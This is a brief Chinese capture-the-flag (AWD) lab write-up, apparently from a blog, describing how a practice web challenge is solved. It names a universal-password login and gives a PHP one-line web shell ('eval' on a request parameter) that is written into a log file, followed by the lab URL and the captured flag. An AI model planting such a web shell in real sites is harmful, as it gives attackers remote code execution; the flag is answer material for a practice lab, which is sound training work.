AWD-Test2

1.已知账号密码,可SSH连接进行代码审计。

2.登录可万能密码 进入,也可注册 后登录。

3.修改url参数,发现报错。确定为Linux系统

4.写入一句话,并提交。(也可以文件上传,这里采用简洁的方法)

复制代码
<?php phpinfo();?>   //写入这个,在日志log.php可查看flag
<?php eval($_REQUEST[123]);?>

5.访问log.php日志文件,发现里面有flag

复制代码
http://efbc89f9-f04d-4204-b60b-65777640d4ef.node5.buuoj.cn:81/log.php

flag{399aa672-cf2d-4aca-9bec-693be96a9083}

注:如果没有,可以在前面一句话处填写 <?php phpinfo();?> 并提交。

相关推荐
键盘不能没有CV键3 小时前
【图片处理】✈️HTML转图片字体异常处理
前端·javascript·html
yantuguiguziPGJ3 小时前
WPF 联合 Web 开发调试流程梳理(基于 Microsoft.Web.WebView2)
前端·microsoft·wpf
大飞记Python4 小时前
部门管理|“编辑部门”功能实现(Django5零基础Web平台)
前端·数据库·python·django
tsumikistep5 小时前
【前端】前端运行环境的结构
前端
你的人类朋友5 小时前
【Node】认识multer库
前端·javascript·后端
Aitter5 小时前
PDF和Word文件转换为Markdown的技术实现
前端·ai编程
qyhua5 小时前
【Linux运维实战】彻底修复 CVE-2011-5094 漏洞
linux·运维·安全
mapbar_front6 小时前
面试问题—上家公司的离职原因
前端·面试
昔人'6 小时前
css使用 :where() 来简化大型 CSS 选择器列表
前端·css
昔人'6 小时前
css `dorp-shadow`
前端·css